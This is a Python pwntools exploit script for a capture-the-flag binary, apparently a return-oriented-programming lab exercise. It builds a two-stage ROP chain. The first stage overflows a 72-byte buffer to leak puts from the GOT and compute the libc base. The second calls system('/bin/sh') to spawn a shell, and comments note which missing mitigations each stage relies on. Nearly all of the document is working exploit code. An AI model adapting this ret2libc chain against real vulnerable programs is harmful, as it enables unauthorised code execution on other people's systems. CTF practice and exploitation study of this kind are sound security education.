#!/usr/bin/python3
from pwn import *

"""
patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_4_0
"""

# Two-stage return-oriented payload against ./babyrop_level_4_0 (a CTF target).
# Stage 1 leaks the runtime address of puts() through the GOT, stage 2 reuses
# the same overflow to call system().  From a defender's point of view each
# stage depends on a missing mitigation: the fixed 72-byte fill needs an
# unchecked copy with no stack canary, the absolute gadget address suggests a
# non-PIE build, and reading the GOT entry needs it to be mapped readable
# (full RELRO would not stop the read but removes the lazy-binding surface).
context.binary = target = ELF("./babyrop_level_4_0", checksec=False)
libc = target.libc
r = process()

# Distance from the start of the overflowed buffer to the saved return address.
PADDING = b"A" * 72

# Gadget address as given on the page; assumed to be a `pop rdi ; ret`.
pop_rdi = 0x401a26


def s(a):
    """Send *a* followed by a newline to the target process."""
    return r.sendline(a)


def chain(*words):
    """Build a payload: PADDING followed by each 64-bit word, in order."""
    return PADDING + b"".join(p64(w) for w in words)


# Stage 1: puts(puts@got) prints the resolved libc pointer, then return into
# challenge() so the same overflow can be triggered again.
s(chain(pop_rdi, target.got.puts, target.sym.puts, target.sym.challenge))

# Parse the leak.  Only six bytes are read — presumably because puts() stops
# at the first NUL of a canonical user-space address — then zero-padded to 8.
r.recvuntil(b"Leaving!\n")
puts = u64(r.recv(6).ljust(8, b"\x00"))
log.info("puts: %#x", puts)
libc.address = puts - libc.sym.puts
log.info("libc: %#x", libc.address)

sh = next(libc.search(b"/bin/sh"))
system = libc.sym.system

# Stage 2: system("/bin/sh").  pop_rdi + 1 is presumably the lone `ret`
# following the pop, inserted to keep the stack 16-byte aligned before the
# call — confirm against the disassembly.
s(chain(pop_rdi, sh, pop_rdi + 1, system))
r.interactive()